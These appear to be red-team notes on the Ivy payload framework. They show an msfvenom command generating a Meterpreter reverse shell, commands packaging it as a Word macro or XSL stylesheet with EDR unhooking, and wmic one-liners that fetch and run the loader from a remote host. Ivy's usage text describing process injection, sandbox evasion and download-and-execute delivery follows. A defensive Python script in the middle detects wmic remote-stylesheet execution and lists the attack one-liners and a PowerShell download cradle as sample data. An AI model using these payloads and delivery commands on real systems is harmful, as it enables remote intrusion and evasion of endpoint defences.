Ivy

Payload Framework

https://github.com/optiv/Ivy

Generate Payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o msf.bin LHOST=172.16.245.16 LPORT=4444

Convert to Word Macro:

./Ivy -stageless -Ix64 msf.bin -delivery macro -product Word -unhook -P Local -O ivymsf.txt

Convert to XSL stylesheet (wmic delivery):

./Ivy -Ix64 msf.bin -P Local -O Ivy.xsl -url http://salesforce.vmoshpit-lab.com -delivery xsl -stageless
  • One-liner commands to execute it (wmic.exe fetches the stylesheet from the -url host over HTTP and runs the embedded loader, so the filename in the URL must match -O; any wmic query works, the /format switch is what matters):

wmic computersystem list full /format:"http://salesforce.vmoshpit-lab.com/Ivy.xsl"
wmic computersystem list brief /format:"http://salesforce.vmoshpit-lab.com/Ivy.xsl"
wmic process list brief /format:"http://salesforce.vmoshpit-lab.com/Ivy.xsl"
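The flip side of the wmic one-liners above is how they look in endpoint telemetry: every variant is wmic.exe with a /format: argument pointing at a remote stylesheet. The script below is an added example (not part of Ivy or this page) that classifies process-creation command lines by that pattern. The sample command lines, the verdict names and the severity mapping are constructed for illustration; the two Ivy one-liners are taken from the page.

```python
import re
from urllib.parse import urlparse

# Constructed sample CommandLine values, shaped like the field in Sysmon Event ID 1
# or Security 4688 with command-line auditing enabled. Not real telemetry.
SAMPLE_COMMAND_LINES = [
    'wmic computersystem list full /format:"http://salesforce.vmoshpit-lab.com/Ivy.xsl"',
    'wmic process list brief /format:"http://salesforce.vmoshpit-lab.com/Ivy.xsl"',
    "WMIC.exe computersystem list brief /FORMAT:'https://cdn.example.com/a.xsl'",
    r'wmic process list /format:"\\fileserver\share\report.xsl"',        # UNC path, still remote
    r'wmic process list /format:"C:\Windows\System32\wbem\csv.xsl"',     # local stylesheet
    "wmic os get caption /format:list",                                  # built-in format keyword
    'WMIC.exe /node:"host1" process call create "notepad.exe"',          # wmic without /format
    'powershell.exe -nop -w hidden -c "iex (iwr http://x/a.ps1)"',       # not wmic at all
]

REMOTE_SCHEMES = {"http", "https", "ftp"}

# /format may be upper or lower case, and the value may be bare, single- or double-quoted.
FORMAT_RE = re.compile(
    r"""/format\s*:\s*(?P<q>["']?)(?P<value>[^"'\s]+)(?P=q)""", re.IGNORECASE
)

# Hypothetical severity mapping; tune to your environment.
SEVERITY = {"remote_xsl": "high", "local_xsl": "medium"}


def _image_name(cmdline):
    """Basename of the first token, lower-cased, quotes stripped ('WMIC.exe' -> 'wmic.exe')."""
    parts = cmdline.strip().split(None, 1)
    if not parts:
        return ""
    return re.split(r"[\\/]", parts[0].strip('"'))[-1].lower()


def classify(cmdline):
    """Return one of: not_wmic, no_format, builtin_format, local_xsl, remote_xsl."""
    if _image_name(cmdline) not in ("wmic", "wmic.exe"):
        return "not_wmic"
    m = FORMAT_RE.search(cmdline)
    if not m:
        return "no_format"
    value = m.group("value")
    # urlparse('C:\\...') reports scheme 'c', so test against an explicit allow-list of schemes.
    if value.startswith("\\\\") or urlparse(value).scheme.lower() in REMOTE_SCHEMES:
        return "remote_xsl"
    if re.search(r"[\\/]", value) or value.lower().endswith(".xsl"):
        return "local_xsl"
    return "builtin_format"   # e.g. list, csv, table: maps to stylesheets shipped in wbem\


def scan(lines):
    """Return (severity, verdict, cmdline) for every line worth alerting on."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict in SEVERITY:
            hits.append((SEVERITY[verdict], verdict, line))
    return hits


if __name__ == "__main__":
    for severity, verdict, cmd in scan(SAMPLE_COMMAND_LINES):
        print(f"{severity:<6} {verdict:<10} {cmd}")
```

The remote case is the high-confidence signal because legitimate wmic usage formats output with the built-in keywords or the stylesheets under System32\wbem; a local .xsl outside that directory is worth a look but is noisier.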

Usage of ./Ivy:
  -Ix64 string
        Path to the x64 payload
  -Ix86 string
        Path to the x86 payload
  -O string
        Name of output file
  -P string
        Payload type: "Inject" (performs a process injection) or "Local" (loads the payload directly into the current process)
  -debug
        Print debug statements
  -delivery string
        Generates a one-liner command to download and execute the payload remotely:
        [] bits  - Generates a Bitsadmin one-liner command to download, execute and remove the loader.
        [] hta   - Generates a blank HTA file containing the loader along with a one-liner command to execute the loader remotely.
        [] macro - Generates an Office macro that downloads and executes the loader remotely.
        [] xsl   - Generates an XSL stylesheet file containing the loader along with a one-liner command to execute the loader remotely.
  -process32 string
        The full path to the x86 application to spawn. Only use applications that are found in System32 & SYSWOW64 (default is rundll32.exe)
  -process64 string
        The full path to the x64 application to spawn. Please specify the path to the process to create/inject into (use \ for the path) (default is explorer.exe)
  -product string
        Name of the Office product to use (Excel, Word, PowerPoint) (default "Excel")
  -sandbox
        Enable sandbox evasion controls (i.e. checks if the system is domain joined)
  -stageless
        Enables stageless payload. When this option is enabled use a raw payload (aka .bin files) instead of .c code
  -unhook
        Unhooks EDR's hooks before loading payload
  -url string
        URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/)